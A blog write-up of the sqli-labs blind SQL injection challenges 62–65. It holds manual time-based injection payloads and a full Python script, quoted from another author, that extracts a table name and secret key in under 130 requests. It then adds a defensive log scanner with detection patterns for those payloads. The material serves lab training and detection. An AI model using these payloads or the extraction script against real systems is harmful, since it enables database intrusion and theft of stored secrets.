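sqli-labs (62-65) - challenges - blind injection

62 Get the flag within 130 steps - time-based blind injection

130 steps! That's underestimating me a bit, isn't it (smirk)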


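1. ?id=2 and 1=2 displays a result, so it is not a numeric injection

2. ?id=2' displays nothing

3. ?id=2' and '1'='1 displays the query result for id 1, which shows the value is wrapped in parentheses and single-quoted.

Blind injection:

  • The table name is 10 random letters and digits

  • The column name is secret_ plus four random letters or digits

  • The password is 24 random letters and digits

The worst-case number of blind-injection requests is (10+4+24)*34=1292, but the flag has to be obtained within 130 steps, so brute-force guessing with Burp Suite will not work

Guessing by hand with binary search, the worst case is (10+4+24)*5=190

With a nested query the table name does not need to be retrieved; combined with binary search, the worst case is (4+24)*5=140 requests, which is clearly very close to 130

Manual injection

Getting the table name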

?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+

Or use the statements below to narrow the range

  • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--
  • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+

After a few attempts the table name can be obtained

Without guessing the table name, use a nested query

select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());

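Script

sqli-labs range Less-62 solution (fewer than 130 requests) - Jianshu (jianshu.com)

As a noob I can't write scripts yet, so I grabbed one from the web

All I can say is the expert is too good: it got it done in a little over 60 requests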


#!/usr/bin/python3
# -*-coding:utf-8-*-

import re
import requests

url = "http://www.test.com/sqli-labs-master/Less-62/index.php"  # change to your own address
try_count = 0

def extract_bits(query, i, bit_values: list):
    """
    Get 3 bits of the i-th character (counting from 1) of the result of query
    Which 3 bits is specified by bit_values
    """
    global try_count

    assert len(bit_values) == 8
    bit_marks = 0
    for v in bit_values:
        bit_marks |= v

    payload = """
    '+(
SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark})
    WHEN {0} THEN 1
    WHEN {1} THEN 2
    WHEN {2} THEN 3
    WHEN {3} THEN 4
    WHEN {4} THEN 5
    WHEN {5} THEN 6
    WHEN {6} THEN 7
    ELSE 8
END
)+'
    """.format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i)
    payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " "))
    # print(payload)

    resp = requests.get(url, params={"id": payload})
    try_count += 1

    infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]

    match = re.search(r"Your Login name : (.*?)<br>", resp.text)
    assert match
    assert match.group(1) in infos
    bits = bit_values[infos.index(match.group(1))]
    return bits

def extract_data(query, length):
    """
    Get length characters of the result of query; for each character only its 7th bit and first 5 bits are fetched
    """
    res = ""
    for i in range(1, length+1):
        b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011, 0b00000100, 0b00000101, 0b00000110, 0b00000111])  # 00000111
        b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000, 0b01000000, 0b01001000, 0b01010000, 0b01011000])  # 01011000
        if b1 & 0b01000000 == 0:
            # the character is a digit
            bit = b1 | b2 | 0b00100000
        else:
            # the character is a letter
            bit = b1 | b2
        res += chr(bit)
    return res


if __name__ == "__main__":
    table_name = extract_data("select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10)
    print("table_name:", table_name)

    secret_key = extract_data("select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x" % table_name, 24)
    print("secret_key:", secret_key)

    print("Done. try_count:", try_count)
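
Seen from the defender's side, every probe and payload above puts SQL text into a parameter that should only ever hold an integer, and the script needs only a little over 60 requests, so a request-volume threshold alone will not notice it. The following is an added example, not part of the original post or the linked script: it scans access-log lines for non-integer `id` values and labels the constructs used on this page. The log lines, their combined-log format and the names `SIGNATURES`, `classify` and `scan` are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructs seen in this page's payloads, matched on the URL-decoded id value.
SIGNATURES = {
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "char_extract": re.compile(r"\b(substr|substring|ascii)\s*\(", re.I),
    "case_channel": re.compile(r"\bcase\b.*\bwhen\b", re.I | re.S),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the signature labels matching one id value; a plain integer yields []."""
    if re.fullmatch(r"\d+", value):
        return []
    labels = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return labels or ["non_integer_id"]

def scan(lines):
    """Map client IP -> {label: count} over every suspicious id parameter."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, target = m.groups()
        values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("id", [])
        for value in values:
            for label in classify(value):
                hits[ip][label] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}

# Constructed sample log lines (combined-log style), not captured traffic.
SAMPLE = [
    '10.0.0.5 - - [08/Aug/2021:18:00:01 +0800] "GET /Less-62/index.php?id=2 HTTP/1.1" 200 812',
    '10.0.0.9 - - [08/Aug/2021:18:00:02 +0800] "GET /Less-62/index.php?id=2%27 HTTP/1.1" 200 640',
    '10.0.0.9 - - [08/Aug/2021:18:00:03 +0800] "GET /Less-62/index.php?id=1%27+and+if(substr((select+1),1,1)%3E%270%27,sleep(3),null)--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [08/Aug/2021:18:00:04 +0800] "GET /Less-62/index.php?id=%27%2B(select+case+ascii(substring((select+table_name+from+information_schema.tables+limit+1),1,1))+%26+7+when+0+then+1+else+8+end)%2B%27 HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE).items():
        print(ip, counts)
```

Detection like this only narrows the window; the durable fix is to bind `id` as an integer parameter on the server instead of concatenating it into the query.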

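63 Within 130 steps - single quote - time-delay injection

id=2 and 1=2 displays a result

id=2' displays nothing

id=2' and '1'='1 displays the query result for 2, so it is a single-quoted string type

Injection skipped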

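64 Within 130 steps - numeric - double parentheses

id=2 and 1=2 displays nothing

id=2)--+ displays nothing

id=2))--+ displays a result: numeric type, double parentheses

Injection skipped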

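65 Within 130 steps - double quote - double parentheses

id=2 and 1=2 displays a result

id=2' displays a result

id=2" displays nothing

id=2" and "1"="1 displays the query result for 1: double quotes, double parentheses

Injection skipped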

posted @ 2021-08-08 18:56  1ink